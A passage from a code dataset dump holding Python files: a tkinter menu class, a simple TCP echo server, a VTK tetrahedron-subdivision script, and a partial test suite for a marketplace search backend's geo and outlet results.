main()\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"general-distributed-systems/zeromq/s20_01_monitor_socket/replier.py","file_name":"replier.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72767095272","text":"from tkinter import *\r\nfrom tkinter.messagebox import *\r\n\r\n\r\nclass menuFrame:\r\n def __init__(self, window):\r\n self.menu = Menu()\r\n self.window = window\r\n self.name = '✔ Comments'\r\n self.gridName = '✔ Coordinate axes'\r\n self.settingMenu = None\r\n\r\n self.sp = ''\r\n\r\n def __makeDropDown(self, dictLabels):\r\n newItem = Menu(self.menu, tearoff=0)\r\n for item in dictLabels:\r\n newItem.add_command(label=item, command=dictLabels[item])\r\n return newItem\r\n\r\n def create(self, field, funcInput, funcLoad, funcClean, funcReturn):\r\n self.field = field\r\n\r\n self.settingMenu = Menu(self.menu, tearoff=0)\r\n\r\n submenu = Menu(self.settingMenu, tearoff=False)\r\n submenu.add_command(label=\"Function\", command=field.changeColorNewPol)\r\n\r\n self.settingMenu.add_command(label=self.name, command=self.__showComment)\r\n self.settingMenu.add_command(label=self.gridName, command=self.__showGrid)\r\n self.settingMenu.add_cascade(label=\"Change color\", menu=submenu)\r\n\r\n self.menu.add_cascade(label='File', menu=self.__makeDropDown({\r\n 'Undo ⏎': lambda: funcReturn(),\r\n 'Clear 🗑': lambda: funcClean(field),\r\n }))\r\n self.menu.add_cascade(label='Setting', menu=self.settingMenu)\r\n self.menu.add_cascade(label='Info', menu=self.__makeDropDown({'About the program': self.__info_programm,\r\n 'About the author': self.__info_author\r\n }))\r\n self.menu.add_cascade(label='Exit', menu=self.__makeDropDown({'Quit': self.window.destroy}))\r\n return self.menu\r\n\r\n def __showComment(self):\r\n self.field.radioShowComments()\r\n self.name = '✔ Comments' if self.name == '❌ Comments' else '❌ Comments'\r\n self.settingMenu.entryconfig(0, label=self.name)\r\n\r\n def __showGrid(self):\r\n self.field.canva.flagShowGrid(not self.field.canva.showArrows)\r\n self.gridName = '✔ Coordinate axes' if self.gridName == '❌ Coordinate axes' else '❌ Coordinate axes'\r\n self.settingMenu.entryconfig(1, label=self.gridName)\r\n\r\n\r\n def __info_author(self):\r\n showinfo('Info', 'Author: Gurova Natalia, IU7-44B')\r\n\r\n def __info_programm(self):\r\n showinfo('Info', '\\nFloating horizon algorithm.\\n\\n'\r\n 'Quick tip: press Ctrl+N to get a new random color')","repo_name":"Tulenenok/BMSTU_CG","sub_path":"lab_10/view/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"43951815065","text":"import socket\r\n\r\n\r\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\r\n s.bind((\"0.0.0.0\",1234))\r\n s.listen()\r\n c, addr = s.accept()\r\n with c:\r\n print(addr, \"connected\")\r\n\r\n while True:\r\n data = c.recv(1024)\r\n if not data:\r\n break\r\n c.sendall(data)","repo_name":"star-and-moon/this_is_my_dream","sub_path":"socket_user.py","file_name":"socket_user.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9034173229","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = 
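# --- Illustrative sketch (editor's addition) ---
# The tkinter menu class above toggles a check mark by rewriting the label text
# ('✔ ...' <-> '❌ ...') and calling entryconfig. Tk has a built-in for this:
# add_checkbutton tied to a BooleanVar keeps the state for you.
from tkinter import Tk, Menu, BooleanVar

root = Tk()
menu = Menu(root)
settings = Menu(menu, tearoff=0)
show_comments = BooleanVar(value=True)
settings.add_checkbutton(label='Comments', variable=show_comments,
                         command=lambda: print(show_comments.get()))
menu.add_cascade(label='Setting', menu=settings)
root.config(menu=menu)
# root.mainloop()  # left commented so the sketch does not block
# --- end sketch ---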
vtkGetDataRoot()\n\ntetraPoints = vtk.vtkPoints()\ntetraPoints.SetNumberOfPoints(4)\ntetraPoints.InsertPoint(0,0,0,0)\ntetraPoints.InsertPoint(1,1,0,0)\ntetraPoints.InsertPoint(2,.5,1,0)\ntetraPoints.InsertPoint(3,.5,.5,1)\naTetra = vtk.vtkTetra()\naTetra.GetPointIds().SetId(0,0)\naTetra.GetPointIds().SetId(1,1)\naTetra.GetPointIds().SetId(2,2)\naTetra.GetPointIds().SetId(3,3)\naTetraGrid = vtk.vtkUnstructuredGrid()\naTetraGrid.Allocate(1,1)\naTetraGrid.InsertNextCell(aTetra.GetCellType(),aTetra.GetPointIds())\naTetraGrid.SetPoints(tetraPoints)\nsub = vtk.vtkSubdivideTetra()\nsub.SetInputData(aTetraGrid)\nshrinker = vtk.vtkShrinkFilter()\nshrinker.SetInputConnection(sub.GetOutputPort())\nmapper = vtk.vtkDataSetMapper()\nmapper.SetInputConnection(shrinker.GetOutputPort())\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\nactor.GetProperty().SetColor(0.7400,0.9900,0.7900)\n# define graphics stuff\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\nren1.AddActor(actor)\nren1.SetBackground(0.1,0.2,0.4)\nrenWin.SetSize(300,300)\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(0.183196,9.15979)\ncam1.SetFocalPoint(0.579471,0.462507,0.283392)\ncam1.SetPosition(-1.04453,0.345281,-0.556222)\ncam1.SetViewUp(0.197321,0.843578,-0.499441)\nren1.ResetCameraClippingRange()\nrenWin.Render()\n# render the image\n#\niren.Initialize()\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Filters/Modeling/Testing/Python/subDivideTetra.py","file_name":"subDivideTetra.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"184568099","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.matcher import Wildcard, NoKey, Contains\nfrom core.types import (\n BookingAvailability,\n ClickType,\n CpaCategory,\n CpaCategoryType,\n Currency,\n DeliveryBucket,\n DeliveryOption,\n ExchangeRate,\n GpsCoord,\n HyperCategory,\n HyperCategoryType,\n MnPlace,\n Model,\n NewShopRating,\n Offer,\n Outlet,\n OutletDeliveryOption,\n Phone,\n PickupBucket,\n PickupOption,\n Region,\n Shop,\n UrlType,\n Vendor,\n VendorLogo,\n)\n\nfrom core.testcase import TestCase, main\nfrom core.datasync import DataSyncYandexUserAddress\nfrom core.report import DefaultFlags\nfrom collections import namedtuple\nfrom core.matcher import Absent\n\nSEARCH_FILTERS = '&mcpricefrom=100&mcpriceto=800&&offer-shipping=store&manufacturer_warranty=1&qrfrom=4&free_delivery=1&home_region_filter=225&delivery_interval=2&fesh=18001,18003,18004,18005&show-book-now-only=1&filter-discount-only=1' # noqa\n\nHOME_GPS_COORD = GpsCoord(37.40, 55.5)\nWORK_GPS_COORD = GpsCoord(37.35, 55.15)\nFAR_GPS_COORD = GpsCoord(17.17, 85.45)\nLOCATION_GPS_COORD = GpsCoord(37.15, 55.15)\n\n\nclass _Offers(object):\n store_offer = Offer(\n hyperid=55564,\n fesh=12320,\n title='store',\n pickup=False,\n price=10,\n waremd5='StoreOffer___________g',\n pickup_buckets=[9301],\n )\n\n pickup_offer = Offer(\n hyperid=55565,\n fesh=12320,\n title='pickup',\n price=100,\n store=False,\n waremd5='PickupOffer__________g',\n pickup_buckets=[9301],\n )\n\n post_term_offer = Offer(\n hyperid=55566,\n fesh=12320,\n title='post_term',\n price=1000,\n pickup=False,\n store=False,\n post_term_delivery=True,\n waremd5='PostTermOffer________g',\n pickup_buckets=[9302],\n )\n\n\nclass T(TestCase):\n 
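# --- Illustrative sketch (editor's addition) ---
# The VTK script above renders the subdivided tetrahedron; to inspect the
# subdivision result itself, the unstructured grid can also be written to a
# legacy .vtk file (this assumes the `sub` filter object from the pipeline
# above):
import vtk

writer = vtk.vtkUnstructuredGridWriter()
writer.SetInputConnection(sub.GetOutputPort())
writer.SetFileName("subdivided_tetra.vtk")
writer.Write()
# --- end sketch ---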
@classmethod\n def prepare_basic(cls):\n # rids: [1, 100]\n # fesh: [101, 200]\n # outlet id: [201, 300]\n # hyperid: [301, 400]\n # hid: [401, 500]\n\n # RANDX randomizing is disabled because these tests don't work with it. See MARKETOUT-21319\n cls.disable_randx_randomize()\n\n cls.index.regiontree += [\n Region(rid=1, name='Город'),\n Region(rid=10, name='Страна', region_type=Region.COUNTRY),\n Region(rid=213, name='Москва для non-guru'),\n ]\n\n cls.index.shops += [\n Shop(fesh=101, priority_region=1, name='Shop1'),\n Shop(fesh=102, priority_region=1, name='Shop2'),\n Shop(fesh=103, priority_region=1, name='Shop3'),\n Shop(fesh=104, priority_region=1, name='Shop4', new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(\n fesh=105,\n priority_region=1,\n name='Shop5',\n new_shop_rating=NewShopRating(new_rating_total=3.0),\n home_region=10,\n ),\n Shop(fesh=106, priority_region=1, name='Shop6', delivery_service_outlets=[261, 262]),\n Shop(fesh=107, priority_region=1, name='Shop7', delivery_service_outlets=[261, 262]),\n # For testing postomat output on geo\n Shop(fesh=110, priority_region=1, name='Shop10', delivery_service_outlets=[400, 401]),\n Shop(fesh=111, priority_region=1, name='Shop11', delivery_service_outlets=[400, 401]),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=211, fesh=101, region=1, gps_coord=GpsCoord(37.1, 55.1), point_type=Outlet.FOR_STORE),\n Outlet(point_id=212, fesh=101, region=1, gps_coord=GpsCoord(37.1, 55.3)),\n Outlet(point_id=213, fesh=101, region=1, gps_coord=GpsCoord(37.3, 55.3), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=214, fesh=101, region=1, gps_coord=GpsCoord(37.3, 55.1), point_type=Outlet.FOR_STORE),\n Outlet(point_id=215, fesh=101, region=1, gps_coord=GpsCoord(37.5, 55.5)),\n Outlet(point_id=216, fesh=101, region=1, gps_coord=GpsCoord(37.7, 55.7), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=221, fesh=102, region=1, gps_coord=GpsCoord(37.1, 55.5), point_type=Outlet.FOR_STORE),\n Outlet(point_id=222, fesh=102, region=1, gps_coord=GpsCoord(37.3, 55.5), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=223, fesh=102, region=1, gps_coord=GpsCoord(37.72, 55.72), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=231, fesh=103, region=1, gps_coord=GpsCoord(37.12, 55.12), point_type=Outlet.FOR_STORE),\n Outlet(point_id=232, fesh=103, region=1, gps_coord=GpsCoord(37.12, 55.32), point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=233, fesh=103, region=1, gps_coord=GpsCoord(37.32, 55.32)),\n Outlet(point_id=241, fesh=104, region=1, gps_coord=GpsCoord(37.42, 55.42)),\n # Аутлеты для тестирования is-main и pickup-price\n Outlet(\n point_id=251,\n fesh=105,\n region=1,\n is_main=False,\n gps_coord=GpsCoord(55.3, 37.7),\n point_type=Outlet.FOR_PICKUP,\n phones=[\n Phone('+7-495-123-45-67*89'),\n Phone('+7-495-987-65-43*21'),\n Phone('+7 (812) 765-43-21'),\n Phone('+7 495 765-43-21'),\n Phone('+7 812 305 26 71'),\n Phone('+7 123 4561234'),\n Phone('8 (7655) 4-72110'),\n Phone('(495) 355-43-21'),\n Phone('355-43-21'),\n Phone('1-23-456'),\n Phone('987654'),\n ],\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=252,\n fesh=105,\n region=1,\n is_main=False,\n gps_coord=GpsCoord(55.25, 37.7),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=100),\n ),\n Outlet(\n point_id=253,\n fesh=105,\n region=1,\n is_main=True,\n gps_coord=GpsCoord(55.5, 37.7),\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(price=100),\n ),\n Outlet(\n point_id=254,\n fesh=105,\n region=1,\n 
is_main=True,\n gps_coord=GpsCoord(55.45, 37.7),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n # Постаматы\n Outlet(\n point_id=261,\n region=1,\n gps_coord=GpsCoord(37.12, 55.02),\n point_type=Outlet.FOR_POST_TERM,\n delivery_service_id=103,\n delivery_option=OutletDeliveryOption(price=150),\n ),\n Outlet(\n point_id=262,\n region=1,\n gps_coord=GpsCoord(37.3, 55.25),\n point_type=Outlet.FOR_POST_TERM,\n delivery_service_id=103,\n delivery_option=OutletDeliveryOption(price=150),\n ),\n # Это не постамат, для тестирования фильтрации постаматов от book_now\n Outlet(\n point_id=263,\n region=1,\n fesh=107,\n gps_coord=GpsCoord(37.4, 55.25),\n point_type=Outlet.FOR_STORE,\n delivery_option=OutletDeliveryOption(price=150),\n ),\n # For testing postomat output on geo\n Outlet(\n point_id=400,\n delivery_service_id=103,\n region=1,\n gps_coord=GpsCoord(55.45, 37.7),\n point_type=Outlet.FOR_POST_TERM,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=401,\n delivery_service_id=103,\n region=1,\n gps_coord=GpsCoord(55.46, 37.7),\n point_type=Outlet.FOR_POST_TERM,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n Outlet(\n point_id=410,\n fesh=110,\n region=1,\n gps_coord=GpsCoord(55.46, 37.7),\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(price=200),\n ),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=5001,\n fesh=101,\n carriers=[99],\n options=[\n PickupOption(outlet_id=211),\n PickupOption(outlet_id=212),\n PickupOption(outlet_id=213),\n PickupOption(outlet_id=214),\n PickupOption(outlet_id=215),\n PickupOption(outlet_id=216),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5002,\n fesh=102,\n carriers=[99],\n options=[PickupOption(outlet_id=221), PickupOption(outlet_id=222), PickupOption(outlet_id=223)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5003,\n fesh=103,\n carriers=[99],\n options=[PickupOption(outlet_id=231), PickupOption(outlet_id=232), PickupOption(outlet_id=233)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5004,\n fesh=104,\n carriers=[99],\n options=[PickupOption(outlet_id=241)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5005,\n fesh=105,\n carriers=[99],\n options=[\n PickupOption(outlet_id=251, price=200),\n PickupOption(outlet_id=252, price=100),\n PickupOption(outlet_id=253, price=100),\n PickupOption(outlet_id=254, price=200),\n ],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5006,\n carriers=[103],\n options=[PickupOption(outlet_id=261, price=150), PickupOption(outlet_id=262, price=150)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5007,\n fesh=107,\n carriers=[99],\n options=[PickupOption(outlet_id=263, price=150)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5008,\n carriers=[103],\n options=[PickupOption(outlet_id=401), PickupOption(outlet_id=401)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=5009,\n fesh=110,\n carriers=[99],\n options=[PickupOption(outlet_id=410)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n # Аутлеты на \"карте\"\n # Числа в скобках - координаты тайлов при zoom = 10\n # 37.0(617) 37.2(617) 37.4(618) 37.6(618) 37.8(619)\n # 55.8(321) 
|--------------|---------------|--------------|---------------\n # | | | | *(223)\n # | | | | *(216)\n # | | | |\n # | | | |\n # 55.6(322) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(221) | *(222) | | *(253)\n # | | | *(215) | *(254)\n # | | |*(241) |\n # 55.4(323) |--------------|---------------|--------------|---------------\n # | | | |\n # | *(232) | *(233) | | *(251)\n # | *(212) | *(213) | | *(252)\n # | | *(262)PostTerm| |\n # 55.2(324) |--------------|---------------|--------------|---------------\n # | *We | | |\n # | *(231) | | |\n # | *(261)PostTe| *(214) | |\n # | *(211) | | |\n # 55.0(325) |--------------|---------------|--------------|---------------\n cls.index.vendors += [\n Vendor(\n vendor_id=401,\n name='samsung',\n website='www.samsung.com',\n webpage_recommended_shops='http://www.samsung.com/ru/brandshops/',\n description='VendorDescription',\n logos=[VendorLogo(url='//mdata.yandex.net/i?path=b0726220734_img_id5949902134120952009.png')],\n ),\n ]\n\n cls.index.hypertree += [HyperCategory(hid=504, output_type=HyperCategoryType.GURU)]\n\n cls.index.models += [\n Model(hyperid=301, title='Ноутбук с модификациями', hid=501, vendor_id=401),\n Model(hyperid=302, title='Телефон с модификациями', hid=502),\n Model(hyperid=303, title='Планшет с модификациями', hid=503),\n # For testing of postomat output on geo\n Model(hyperid=350, title='pepyaka-naturalnaya', hid=550),\n ]\n\n cls.index.offers += [\n Offer(\n fesh=101,\n title='good11',\n hyperid=301,\n price=100,\n bid=100,\n randx=100,\n booking_availabilities=[\n BookingAvailability(outlet_id=211, region_id=1, amount=5),\n BookingAvailability(outlet_id=212, region_id=1, amount=5),\n BookingAvailability(outlet_id=213, region_id=1, amount=5),\n BookingAvailability(outlet_id=214, region_id=1, amount=5),\n BookingAvailability(outlet_id=215, region_id=1, amount=5),\n BookingAvailability(outlet_id=216, region_id=1, amount=5),\n ],\n pickup_buckets=[5001],\n ),\n Offer(\n fesh=101,\n title='good12',\n hyperid=301,\n price=150,\n bid=150,\n randx=150,\n booking_availabilities=[\n BookingAvailability(outlet_id=211, region_id=1, amount=5),\n BookingAvailability(outlet_id=212, region_id=1, amount=5),\n BookingAvailability(outlet_id=213, region_id=1, amount=5),\n ],\n pickup_buckets=[5001],\n ),\n Offer(\n fesh=101,\n title='good13',\n hyperid=301,\n price=90,\n bid=150,\n randx=150,\n booking_availabilities=[\n BookingAvailability(outlet_id=211, region_id=1, amount=5),\n BookingAvailability(outlet_id=212, region_id=1, amount=5),\n ],\n pickup_buckets=[5001],\n ),\n Offer(fesh=101, title='good14', hyperid=301, price=80, bid=100, randx=90, pickup_buckets=[5001]),\n Offer(\n fesh=102,\n title='good21',\n hyperid=301,\n vendor_id=401,\n price=100,\n bid=250,\n cbid=250,\n randx=250,\n waremd5='2b0-iAnHLZST2Ekoq4xElr',\n booking_availabilities=[\n BookingAvailability(outlet_id=221, region_id=1, amount=5),\n BookingAvailability(outlet_id=222, region_id=1, amount=5),\n ],\n pickup_buckets=[5002],\n ),\n Offer(\n fesh=102,\n title='good21_vcluster',\n vclusterid=1000000007,\n price=100,\n bid=250,\n randx=250,\n waremd5='ppp-iAnHLZST2Ekoq4xElr',\n booking_availabilities=[\n BookingAvailability(outlet_id=221, region_id=1, amount=5),\n BookingAvailability(outlet_id=222, region_id=1, amount=5),\n ],\n pickup_buckets=[5002],\n ),\n Offer(fesh=102, title='good22', hyperid=301, price=90, bid=100, randx=90, pickup_buckets=[5002]),\n Offer(\n fesh=103,\n title='good31',\n hyperid=301,\n price=100,\n bid=50,\n 
randx=50,\n booking_availabilities=[\n BookingAvailability(outlet_id=231, region_id=1, amount=5),\n ],\n pickup_buckets=[5003],\n ),\n Offer(\n fesh=103,\n title='good32',\n hyperid=301,\n price=100,\n bid=40,\n randx=40,\n booking_availabilities=[\n BookingAvailability(outlet_id=231, region_id=1, amount=5),\n BookingAvailability(outlet_id=232, region_id=1, amount=5),\n BookingAvailability(outlet_id=233, region_id=1, amount=5),\n ],\n pickup_buckets=[5003],\n ),\n Offer(fesh=103, title='good33', hyperid=301, price=90, bid=30, randx=30, pickup_buckets=[5003]),\n Offer(fesh=104, title='good41', hyperid=301, price=90, bid=100, randx=90, pickup_buckets=[5004]),\n Offer(\n fesh=106,\n title='good_PostTerm_6',\n hyperid=301,\n price=90,\n bid=100,\n randx=90,\n post_term_delivery=True,\n pickup_buckets=[5006],\n ),\n Offer(\n fesh=107,\n title='Post_terminal_and_book_now_6',\n hyperid=701,\n price=90,\n bid=100,\n randx=90,\n post_term_delivery=True,\n booking_availabilities=[\n BookingAvailability(outlet_id=263, region_id=1, amount=5),\n ],\n pickup_buckets=[5007, 5006],\n ),\n Offer(\n fesh=105,\n title='good51',\n hyperid=302,\n price=90,\n bid=100,\n randx=90,\n booking_availabilities=[\n BookingAvailability(outlet_id=251, region_id=1, amount=5),\n BookingAvailability(outlet_id=252, region_id=1, amount=5),\n BookingAvailability(outlet_id=253, region_id=1, amount=5),\n BookingAvailability(outlet_id=254, region_id=1, amount=5),\n ],\n pickup_buckets=[5005],\n ),\n # Офферы для тестирования фильтров\n Offer(\n fesh=104,\n title='good52',\n hyperid=303,\n price=90,\n randx=90,\n manufacturer_warranty=True,\n has_delivery_options=False,\n available=True,\n pickup_buckets=[5004],\n ),\n Offer(\n fesh=105,\n title='good53',\n hyperid=303,\n price=90,\n randx=90,\n manufacturer_warranty=False,\n has_delivery_options=False,\n available=False,\n pickup_buckets=[5005],\n ),\n # For testing of postomat output on geo\n Offer(\n fesh=110,\n title='pepyaka-postomatish-1',\n price=1600,\n post_term_delivery=True,\n pickup_buckets=[5008, 5009],\n ),\n Offer(\n fesh=110,\n title='pepyaka-postomatish-2',\n price=1900,\n post_term_delivery=True,\n pickup_buckets=[5008, 5009],\n ),\n Offer(\n fesh=111,\n title='pepyaka-postomatish-3',\n price=1800,\n post_term_delivery=True,\n ),\n Offer(\n fesh=111,\n title='pepyaka-postomatish-4',\n price=1700,\n post_term_delivery=True,\n ),\n ]\n\n # Для тестирования групповой модели\n cls.index.models += [\n Model(hid=401, hyperid=311, group_hyperid=310),\n Model(hid=401, hyperid=312, group_hyperid=310),\n ]\n cls.index.offers += [\n Offer(fesh=104, hid=401, hyperid=310, pickup_buckets=[5004]),\n Offer(fesh=104, hid=401, hyperid=311, pickup_buckets=[5004]),\n Offer(fesh=104, hid=401, hyperid=312, pickup_buckets=[5004]),\n ]\n\n # Для тестирования offer-shipping\n for hyperid in range(1000, 1100):\n cls.index.models += [Model(hid=601, hyperid=hyperid)]\n\n cls.index.offers += [\n Offer(fesh=105, hid=601, hyperid=1100, pickup_buckets=[5005]),\n ]\n\n def test_geo_output_format(self):\n # Что тестируем: формат выдачи аутлета без применения фильтров\n # Оффер good21 доступен в трех аутлетах (\"bundleCount\": 3)\n # В аутлете 211 доступны два оффера (\"bundleCount\": 2)\n response = self.report.request_json('place=geo&hid=501&rids=0&show-urls=geo,geoOutlet,geoPointInfo')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good21\"},\n \"bundleCount\": 2,\n \"bundled\": {\"outletId\": 221, \"count\": 2},\n \"outlet\": {\n \"entity\": 
\"outlet\",\n \"id\": \"221\",\n \"name\": \"OUTLET-102-221\",\n \"type\": \"store\",\n \"email\": \"\",\n \"shop\": {\"id\": 102},\n \"address\": {\"locality\": \"\", \"street\": \"\", \"building\": \"\", \"block\": \"\", \"note\": \"\"},\n \"region\": {\n \"entity\": \"region\",\n \"id\": 1,\n \"name\": u\"Город\",\n \"lingua\": {\"name\": {\"genitive\": u\"Город\", \"preposition\": \" \", \"prepositional\": u\"Город\"}},\n },\n \"gpsCoord\": {\"longitude\": \"37.1\", \"latitude\": \"55.5\"},\n \"bundleCount\": 3,\n \"bundled\": {\"count\": 3},\n },\n 'vendor': {\n 'name': 'samsung',\n 'website': 'www.samsung.com',\n \"description\": \"VendorDescription\",\n \"logo\": {\n \"entity\": \"picture\",\n \"url\": \"//mdata.yandex.net/i?path=b0726220734_img_id5949902134120952009.png\",\n },\n \"webpageRecommendedShops\": \"http://www.samsung.com/ru/brandshops/\",\n },\n },\n preserve_order=True,\n )\n\n # Проверяем наличие записей в логах\n self.click_log.expect(ClickType.GEO, url_type=UrlType.GEO, shop_id=102, dtype='cpa', type_id=3)\n self.click_log.expect(ClickType.GEO_OUTLET, url_type=UrlType.GEO_OUTLET, shop_id=102)\n self.click_log.expect(ClickType.GEO_OUTLET_INFO, url_type=UrlType.GEO_OUTLET_INFO, shop_id=102)\n self.show_log.expect(url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg', url_type=UrlType.GEO)\n self.show_log.expect(\n url='//market.yandex.ru/geo?fesh=102&offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221',\n url_type=UrlType.GEO_OUTLET,\n )\n self.show_log.expect(\n url='//market.yandex.ru/gate/maps/getpointinfo.xml?offerid=2b0-iAnHLZST2Ekoq4xElg&point_id=221',\n url_type=UrlType.GEO_OUTLET_INFO,\n )\n\n def test_show_offer_param(self):\n # Что тестируем: работу cgi-параметра &show-offer\n\n # Поведение по умолчанию - показ и офферов и тайлов\n response = self.report.request_json('place=geo&hyperid=301&tile=619,321&zoom=10&rids=0')\n self.assertFragmentIn(response, {\"results\": [], \"tiles\": []}, preserve_order=True)\n\n # Показ только офферов\n response = self.report.request_json('place=geo&show-outlet=offers&hyperid=301&rids=0')\n self.assertFragmentIn(response, {\"results\": []}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"tiles\": []}, preserve_order=True)\n\n # Показ только тайлов\n response = self.report.request_json('place=geo&show-outlet=tiles&tile=619,321&zoom=10&hyperid=301&rids=0')\n self.assertFragmentIn(response, {\"tiles\": []}, preserve_order=True)\n self.assertFragmentNotIn(response, {\"results\": []}, preserve_order=True)\n\n def test_geo_bounding_small(self):\n # Что тестируем: выдачу с учетом баундинга в маленьком квадрате в двух вариантах:\n # с дефолтным ранжированием и с ранжированием по удаленности\n # В выдаче должны остаться аутлеты 211 и 231 (см \"карту\")\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good12\"},\n \"bundleCount\": 4,\n \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 4},\n \"outlet\": {\"id\": \"211\", \"bundleCount\": 6, \"bundled\": {\"modelId\": 301, \"count\": 6}},\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"good_PostTerm_6\"},\n \"bundleCount\": 1,\n \"bundled\": {\"modelId\": 301, \"outletId\": 261, \"count\": 1},\n \"outlet\": {\n \"id\": \"261\",\n },\n 
},\n                {\n                    \"entity\": \"offer\",\n                    \"titles\": {\"raw\": \"good31\"},\n                    \"bundleCount\": 3,\n                    \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 3},\n                    \"outlet\": {\"id\": \"231\", \"bundleCount\": 3, \"bundled\": {\"modelId\": 301, \"count\": 3}},\n                },\n            ],\n            preserve_order=True,\n        )\n\n        # Что тестируем: выдача не меняется при regset=1:\n        response = self.report.request_json(\n            'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=1&regset=1'\n        )\n        self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n\n        # escaped geo coordinates MARKETOUT-27050\n        response = self.report.request_json(\n            'place=geo&geo-location=37.15%252C55.15&geo_bounds_lb=37.0%252C55.0&geo_bounds_rt=37.2%252C55.2&hyperid=301&rids=1&regset=1'\n        )\n        self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n\n        response = self.report.request_json(\n            'place=geo&how=distance&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=301&rids=0&touch=1'\n        )\n        self.assertFragmentIn(response, {\"search\": {\"total\": 3, \"shops\": 3, \"shopOutlets\": 3}}, preserve_order=True)\n        self.assertFragmentIn(\n            response,\n            [\n                {\n                    \"entity\": \"offer\",\n                    \"titles\": {\"raw\": \"good31\"},\n                    \"bundleCount\": 3,\n                    \"bundled\": {\"modelId\": 301, \"outletId\": 231, \"count\": 3},\n                    \"outlet\": {\"id\": \"231\", \"bundleCount\": 3, \"bundled\": {\"modelId\": 301, \"count\": 3}},\n                },\n                {\n                    \"entity\": \"offer\",\n                    \"titles\": {\"raw\": \"good12\"},\n                    \"bundleCount\": 4,\n                    \"bundled\": {\"modelId\": 301, \"outletId\": 211, \"count\": 4},\n                    \"outlet\": {\"id\": \"211\", \"bundleCount\": 6, \"bundled\": {\"modelId\": 301, \"count\": 6}},\n                },\n            ],\n            preserve_order=True,\n        )\n\n    def test_geo_bounding_large(self):\n        # Что тестируем: выдачу с учетом баундинга в большом квадрате в двух вариантах:\n        # с дефолтным ранжированием и с ранжированием по удаленности\n        # В выдаче должны остаться аутлеты 211-214 и 231-233 (см \"карту\") и 261,262(Постаматы)\n        # Дефолтное значение geo-sort-gran = 2 (т.е. 
